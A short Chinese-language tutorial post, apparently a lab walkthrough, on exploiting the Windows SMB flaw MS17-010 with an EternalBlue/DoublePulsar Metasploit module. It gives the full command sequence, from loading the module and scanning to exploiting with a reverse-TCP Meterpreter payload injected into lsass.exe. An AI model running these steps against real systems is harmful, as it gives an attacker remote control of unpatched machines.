MS-17-010 實作

June 27, 2017

1. 環境

2. 利用的模組

github:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

3. 開始

利用的模組載入 Kali 如下:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
#把 deps目錄 And eternalblue_doublepulsar.rb 作複製動做,預設是沒有此模組。
cp -r Eternalblue-Doublepulsar-Metasploit/deps/ \
/usr/share/metasploit-framework/modules/exploits/windows/smb/ \

cp -r Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb \ 
/usr/share/metasploit-framework/modules/exploits/windows/smb/ 

cp -r Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb \
/usr/share/metasploit-framework/modules/auxiliary/scanner/msf/

4. 開啟 msfconsole

5. ms17-010 漏洞檢查

use auxiliary/scanner/smb/smb_ms17_010 #接著如下圖作
show options
set RHOSTS IP # 設定靶機的IP

6. Exploit ms17-010

由於沒設定靶機 IP,以下進行設置

set RHOSTS IP # 設定靶機的IP 
#設定 PAYLOAD(因為是 64 bit,所以需要設定)如果是 windows/meterpreter/reverse_tcp,會獲取不到 Session。
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit #建立不起 Session

show options #檢查
set PROCESSINJECT lsass.exe #因為是 64 bit 所以要更改成這個

exploit # 在一次,這次成功進去如下

接著,就可操控靶機了

如果發現 exploit 出現 wine 的問題,請如下解決看看。

dpkg –add-architecture i386 && apt-get update && apt-get install wine32

參考資料: